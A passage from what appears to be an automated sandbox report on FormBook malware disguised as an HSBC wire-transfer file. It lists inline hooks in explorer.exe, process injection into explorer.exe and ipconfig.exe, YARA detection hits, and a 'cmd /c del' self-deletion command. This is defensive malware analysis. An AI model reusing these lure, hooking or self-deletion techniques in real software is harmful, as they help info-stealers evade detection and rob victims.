                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEF
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEF

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 6892 Parent PID: 2244

                    General

                    Start time:18:56:44
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0x3e0000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 7164 Parent PID: 6892

                    General

                    Start time:18:56:47
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Imagebase:0xc00000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Analysis Process: explorer.exe PID: 3352 Parent PID: 7164

                    General

                    Start time:18:56:50
                    Start date:25/11/2021
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Analysis Process: ipconfig.exe PID: 6536 Parent PID: 3352

                    General

                    Start time:18:57:12
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0xc50000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    Analysis Process: cmd.exe PID: 6672 Parent PID: 6536

                    General

                    Start time:18:57:17
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Analysis Process: conhost.exe PID: 6888 Parent PID: 6672

                    General

                    Start time:18:57:18
                    Start date:25/11/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >